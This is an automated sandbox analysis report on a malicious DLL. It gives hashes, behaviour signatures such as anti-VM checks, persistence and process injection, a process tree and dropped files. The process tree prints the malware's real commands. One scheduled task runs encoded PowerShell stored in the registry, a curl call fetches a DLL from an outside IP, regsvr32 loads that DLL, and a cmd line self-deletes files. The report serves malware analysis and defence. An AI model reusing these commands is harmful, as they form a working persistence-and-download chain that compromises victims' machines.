Resubmissions

07/02/2023, 14:13

230207-rjd39sfc9s 10

07/02/2023, 14:08

230207-rfx2zaca82 9

Analysis

  • max time kernel
    367s
  • max time network
    340s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    07/02/2023, 14:13

General

  • Target: wbroidpyUsiqfHRGEXoN-Q4oViHeNp9anCBKxWYrEd0.dll
  • Size: 143KB
  • MD5: 920625c516d7184fed4610279dd6c164
  • SHA1: 6e1fc17dd3965d707a29f0ca2ad01f693fe506b6
  • SHA256: c1bae889da7252c8aa7c7446117a0dfd0e285621de369f5a9c204ac5662b11dd
  • SHA512: 3a6b0b7bb654384699f06db91f8bc287be128f6dc57e6fb2d19129d2557e04f311b6201a8783483790751645c0df8d702265bed7d09380019d09ceee74052058
  • SSDEEP: 3072:8uZ6hcvJTZ9oVFBfnIyht8vPs1XQHBC92ePuH:dTN4HBnI2t8vPLu6

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies registry class 49 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Runs regedit.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 38 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:2704
      • C:\Windows\system32\regsvr32.exe
        regsvr32 /s C:\Users\Admin\AppData\Local\Temp\wbroidpyUsiqfHRGEXoN-Q4oViHeNp9anCBKxWYrEd0.dll
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:380
        • C:\Windows\SysWOW64\regsvr32.exe
          /s C:\Users\Admin\AppData\Local\Temp\wbroidpyUsiqfHRGEXoN-Q4oViHeNp9anCBKxWYrEd0.dll
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Suspicious use of WriteProcessMemory
          PID:4296
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks.exe /Create /F /TN "{8B30B3CD-2068-4F75-AB1F-FCAE6AF928B6}" /TR " cmd /q /c start /min \"\" powershell \"$nonresistantOutlivesDictatorial = Get-ItemProperty -Path HKCU:\Software\nonresistantOutlivesDictatorial; powershell -encodedcommand $nonresistantOutlivesDictatorial.AphroniaHaimavati \"" /SC MINUTE /MO 13
            4⤵
            • Creates scheduled task(s)
            PID:1408
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /C "ping localhost && DEL /F /S /Q /A "
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:808
            • C:\Windows\SysWOW64\PING.EXE
              ping localhost
              5⤵
              • Runs ping.exe
              PID:1800
      • C:\Windows\regedit.exe
        "C:\Windows\regedit.exe"
        2⤵
        • Modifies registry class
        • Runs regedit.exe
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        PID:4748
      • C:\Windows\system32\notepad.exe
        "C:\Windows\system32\notepad.exe" "C:\Users\Admin\Desktop\reg.reg"
        2⤵
        • Opens file in notepad (likely ransom note)
        PID:1300
      • C:\Windows\system32\mmc.exe
        "C:\Windows\system32\mmc.exe" "C:\Windows\system32\taskschd.msc" /s
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        PID:4296
      • C:\Windows\SysWOW64\WWAHost.exe
        "C:\Windows\System32\WWAHost.exe"
        2⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:1544
        • C:\Windows\SysWOW64\cmd.exe
          cmd.exe /C "ping localhost && copy /b /y %SystemRoot%\System32\ActivationManager.dll %appdata%\Microsoft\nonresistantOutlivesDictatorial\AphroniaHaimavati.dll"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4732
          • C:\Windows\SysWOW64\PING.EXE
            ping localhost
            4⤵
            • Runs ping.exe
            PID:2284
    • C:\Windows\system32\cmd.EXE
      C:\Windows\system32\cmd.EXE /q /c start /min "" powershell "$nonresistantOutlivesDictatorial = Get-ItemProperty -Path HKCU:\Software\nonresistantOutlivesDictatorial; powershell -encodedcommand $nonresistantOutlivesDictatorial.AphroniaHaimavati "
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:884
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell "$nonresistantOutlivesDictatorial = Get-ItemProperty -Path HKCU:\Software\nonresistantOutlivesDictatorial; powershell -encodedcommand $nonresistantOutlivesDictatorial.AphroniaHaimavati "
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:4928
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand [base64-encoded command blob removed]
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2264
          • C:\Windows\system32\curl.exe
            "C:\Windows\system32\curl.exe" --url https://37.1.215.220/messages/DBcB6q9SM6 -X POST --insecure --output C:\Users\Admin\AppData\Roaming\Microsoft\nonresistantOutlivesDictatorial\AphroniaHaimavati.dll
            4⤵
              PID:2076
            • C:\Windows\system32\regsvr32.exe
              "C:\Windows\system32\regsvr32.exe" /s C:\Users\Admin\AppData\Roaming\Microsoft\nonresistantOutlivesDictatorial\AphroniaHaimavati.dll
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:2292
              • C:\Windows\SysWOW64\regsvr32.exe
                /s C:\Users\Admin\AppData\Roaming\Microsoft\nonresistantOutlivesDictatorial\AphroniaHaimavati.dll
                5⤵
                • Suspicious use of NtCreateUserProcessOtherParentProcess
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                • Suspicious use of WriteProcessMemory
                PID:2404

Network

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize: 3KB
    MD5: 223bd4ae02766ddc32e6145fd1a29301
    SHA1: 900cfd6526d7e33fb4039a1cc2790ea049bc2c5b
    SHA256: 1022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e
    SHA512: 648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 64B
    MD5: 5caad758326454b5788ec35315c4c304
    SHA1: 3aef8dba8042662a7fcf97e51047dc636b4d4724
    SHA256: 83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
    SHA512: 4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

  • C:\Users\Admin\AppData\Roaming\Microsoft\nonresistantOutlivesDictatorial\AphroniaHaimavati.dll
    Filesize: 1.4MB
    MD5: 6e377c08962a165f90e3b7462dc99fa0
    SHA1: 7db3f47b591b1f8b1276b14140ff77257fcaa286
    SHA256: d4756faf2fec6ff50903d239dfc28a4f534c4e28099ccadf136b52eee9e13e68
    SHA512: 70fc5c6cf2c757c93ca7dd33d20327139fddd15803cda0d4f2cbc673fa5431a96275ba9ece82377e823b76e7becabf1cc63b593a1752124dcd6e8fedf5696542

  • C:\Users\Admin\AppData\Roaming\Microsoft\nonresistantOutlivesDictatorial\AphroniaHaimavati.dll
    Filesize: 1.0MB
    MD5: 46808efd5331489a931e51792623caca
    SHA1: 1e7e75bcee397e9c447edb7a7a20a5c81eee8a87
    SHA256: 59f42ecde152f78731e54ea27e761bba748c9309a6ad1c2fd17f0e8b90f8aed1
    SHA512: 33fcf014dba7718a7e99a4860854b6067e525c8e1ab187dd9468fd4913fe7fe450b89beb5c915e424288857ce6137f96ef970d26b9bd061991d1d6a97e63b853

  • C:\Users\Admin\Desktop\reg.reg
    Filesize: 4KB
    MD5: 20706974cd5e49fc4884aadafec40a92
    SHA1: 3455618aa35e016cf696159db1805b3217e5b90e
    SHA256: acee8d2a27fb2d41fa6612ab732996fe00337f5391959399a1daa3161b23e2fa
    SHA512: 470c1ef90e385164250b3d1ad89556a32eccb537dc71eba7b49b70858c47039f491255e4a4b750783bea98886a798ee17de4006878a9a6789fa297a89f3d4c78

  • memory/1544-161-0x00000000008E0000-0x00000000008EC000-memory.dmp
    Filesize: 48KB
  • memory/1544-165-0x00000000008E0000-0x00000000008EC000-memory.dmp
    Filesize: 48KB
  • memory/2264-148-0x00007FFB8D1C0000-0x00007FFB8DC81000-memory.dmp
    Filesize: 10.8MB
  • memory/2264-154-0x00007FFB8D1C0000-0x00007FFB8DC81000-memory.dmp
    Filesize: 10.8MB
  • memory/2264-150-0x00007FFB8D1C0000-0x00007FFB8DC81000-memory.dmp
    Filesize: 10.8MB
  • memory/4296-136-0x00000000005F0000-0x00000000005F7000-memory.dmp
    Filesize: 28KB
  • memory/4296-142-0x00007FFB8D1C0000-0x00007FFB8DC81000-memory.dmp
    Filesize: 10.8MB
  • memory/4296-140-0x000000001EBBA000-0x000000001EBBF000-memory.dmp
    Filesize: 20KB
  • memory/4296-141-0x0000000021620000-0x0000000021623000-memory.dmp
    Filesize: 12KB
  • memory/4296-139-0x00007FFB8D1C0000-0x00007FFB8DC81000-memory.dmp
    Filesize: 10.8MB
  • memory/4296-135-0x00000000005E0000-0x00000000005E5000-memory.dmp
    Filesize: 20KB
  • memory/4928-145-0x00007FFB8D1C0000-0x00007FFB8DC81000-memory.dmp
    Filesize: 10.8MB
  • memory/4928-144-0x00000176CA290000-0x00000176CA2B2000-memory.dmp
    Filesize: 136KB
  • memory/4928-159-0x00007FFB8D1C0000-0x00007FFB8DC81000-memory.dmp
    Filesize: 10.8MB
  • memory/4928-149-0x00007FFB8D1C0000-0x00007FFB8DC81000-memory.dmp
    Filesize: 10.8MB